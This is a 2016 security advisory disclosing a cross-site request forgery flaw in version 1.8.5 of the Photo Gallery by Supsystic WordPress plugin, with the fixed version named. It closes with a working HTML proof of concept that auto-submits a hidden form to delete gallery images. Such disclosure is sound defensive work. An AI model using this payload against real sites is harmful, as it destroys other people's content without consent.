------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary images from the Photo Gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to delete arbitrary images
from the Photo Gallery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to
delete images from an existing gallery. In order to exploit this issue,
the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post"
action="http://192.168.1.18/wp-admin/admin-ajax.php">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="gallery_id" value="2">
			<input type="hidden" name="ids[]" value="5">
			<input type="hidden" name="ids[]" value="7">
			<input type="hidden" name="route[module]" value="galleries">
			<input type="hidden" name="route[action]" value="deleteResource">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip